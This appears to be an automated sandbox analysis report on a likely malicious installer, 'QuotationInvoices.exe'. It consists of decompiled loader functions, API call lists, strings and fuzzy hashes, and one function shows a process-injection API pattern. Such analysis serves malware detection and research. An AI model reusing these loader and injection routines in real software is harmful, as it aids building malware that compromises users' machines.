Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-2028306314
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065ff
0x00406608
0x0040660a
0x0040660a
0x0040660e
0x00406620
0x0040661a
0x0040661a
0x0040661a
0x00406624
0x00406638
0x0040664c
0x00406653

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065FF
wsprintfA.USER32 ref: 00406638
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Strings

%s%s.dll, xrefs: 00406632
\, xrefs: 00406610
UXTHEME, xrefs: 004065F1

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D

Uniqueness

Uniqueness Score: -1.00%

Function 004032BF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x415be3
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004032cf
0x004032e2
0x004032e7
0x00403417
0x00403419
0x00000000
0x0040341f
0x004032f3
0x00403306
0x0040330c
0x00403312
0x0040331d
0x00403322
0x00403327
0x0040332f
0x00403331
0x00403331
0x0040333a
0x00403341
0x00000000
0x00000000
0x00403347
0x0040334d
0x00403353
0x00000000
0x00403359
0x0040335f
0x0040337f
0x00403384
0x00403389
0x0040338f
0x00403395
0x004033a6
0x00000000
0x00000000
0x004033a8
0x004033ae
0x004033b0
0x004033d3
0x004033d9
0x00000000
0x00000000
0x004033db
0x004033dd
0x00000000
0x00000000
0x004033df
0x004033df
0x004033f2
0x00000000
0x00000000
0x00403401
0x00000000
0x00403401
0x004033ba
0x004033c1
0x0040340e
0x00403414
0x00403414
0x00000000
0x00403414
0x004033c3
0x004033c9
0x004033cf
0x00000000
0x00000000
0x00000000
0x00403412
0x00403412
0x00000000
0x00403412
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004032D3

Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401

Strings

[A, xrefs: 0040338F, 004033A8
IDFromString, xrefs: 00403318, 004033B3

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID: IDFromString$[A
API String ID: 1092082344-567298602
Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405e19
0x00405e1f
0x00405e20
0x00405e20
0x00405e25
0x00405e26
0x00405e29
0x00405e33
0x00405e40
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4f
0x00000000
0x00000000
0x00405e51
0x00000000
0x00405e51
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E29
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43

Strings

nsa, xrefs: 00405E20
"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 00405E15
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\QuotationInvoices.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1787412243
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 6FC516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6FC516DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6fc5405c = _a8;
				 *0x6fc54060 = _a16;
				 *0x6fc54064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6fc54038, E6FC51556);
				_push(1); // executed
				_t37 = E6FC51A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6FC522AF(_t54);
					}
					E6FC522F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E6FC524D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6FC5156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E6FC524D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E6FC524D8(_t54);
							_t37 = GlobalFree(E6FC51266(E6FC51559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6FC5249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E6FC514E2( *0x6fc54058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6FC52CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6FC52A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6FC526B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6fc516db
0x6fc516db
0x6fc516db
0x6fc516e5
0x6fc516ed
0x6fc516fa
0x6fc51708
0x6fc5170b
0x6fc5170d
0x6fc51712
0x6fc51717
0x6fc51836
0x6fc51836
0x6fc5171d
0x6fc51721
0x6fc51724
0x6fc51729
0x6fc5172b
0x6fc51731
0x6fc51737
0x6fc51767
0x6fc5176e
0x6fc51792
0x6fc517dd
0x6fc51794
0x6fc51794
0x6fc51795
0x6fc5179b
0x6fc5179c
0x6fc517a6
0x6fc517a9
0x6fc517ae
0x6fc517b5
0x6fc517b5
0x6fc517bc
0x6fc517c2
0x6fc517c8
0x6fc517d5
0x6fc517d6
0x6fc517d9
0x6fc51770
0x6fc51771
0x6fc51786
0x6fc51786
0x6fc517e7
0x6fc517ea
0x6fc517f7
0x6fc517fe
0x6fc51806
0x6fc51809
0x6fc51809
0x6fc51806
0x6fc51816
0x6fc5181e
0x6fc51823
0x6fc51816
0x6fc5182b
0x00000000
0x6fc5182d
0x00000000
0x6fc5182e
0x6fc5182b
0x6fc5173b
0x6fc5173e
0x6fc5175c
0x00000000
0x00000000
0x6fc5175f
0x6fc51764
0x6fc51764
0x6fc51766
0x00000000
0x6fc51766
0x6fc51740
0x6fc51741
0x6fc51749
0x6fc5174a
0x00000000
0x6fc5174a
0x6fc51743
0x6fc51744
0x6fc51752
0x00000000
0x6fc51752
0x6fc51747
0x00000000
0x00000000
0x00000000
0x6fc51747

APIs

Part of subcall function 6FC51A98: GlobalFree.KERNEL32 ref: 6FC51D09
Part of subcall function 6FC51A98: GlobalFree.KERNEL32 ref: 6FC51D0E
Part of subcall function 6FC51A98: GlobalFree.KERNEL32 ref: 6FC51D13

GlobalFree.KERNEL32 ref: 6FC51786
FreeLibrary.KERNEL32(?), ref: 6FC51809
GlobalFree.KERNEL32 ref: 6FC5182E

Part of subcall function 6FC522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6FC522E0

Part of subcall function 6FC526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6FC51757,00000000), ref: 6FC52782

Part of subcall function 6FC5156B: wsprintfA.USER32 ref: 6FC51599

Strings

, xrefs: 6FC5180F

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: b5af56b05e69cdf9912c07fc0751a602422294193eb00d32f651d6d12806ab21
Instruction ID: ab7b26e5481aa3623122cb2163970cd92cdaf7fa34593e6f12ab47e01cbdfce4
Opcode Fuzzy Hash: b5af56b05e69cdf9912c07fc0751a602422294193eb00d32f651d6d12806ab21
Instruction Fuzzy Hash: D4418D714003059BDB00AF7C8D98BDA37E8BF05368F048566E915AE183FB74A579CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 10003034, Relevance: 6.6, APIs: 4, Instructions: 564processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 1000339B
GetThreadContext.KERNELBASE(?,00010007), ref: 100033BE
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 100033E2

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: a794e1521d1c6d3ec72e88ae921a213a06c897cd1915622cbafa667ed5d1ae8c
Instruction ID: fa1db898a3ec5f26045ceec6e63cb9f716bac9dff479ee0a0d4c8a467f3f201d
Opcode Fuzzy Hash: a794e1521d1c6d3ec72e88ae921a213a06c897cd1915622cbafa667ed5d1ae8c
Instruction Fuzzy Hash: 7E322835E40208AEEB61CBA4DC45BEEB7B9FF04741F208096E518FA2A0D7755A84DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560,00000000), ref: 00405C8C
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e62
0x00405e72
0x00405e7a
0x00000000
0x00405e81
0x00000000
0x00405e83

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,IDFromString,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72

Strings

IDFromString, xrefs: 00405E5E

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
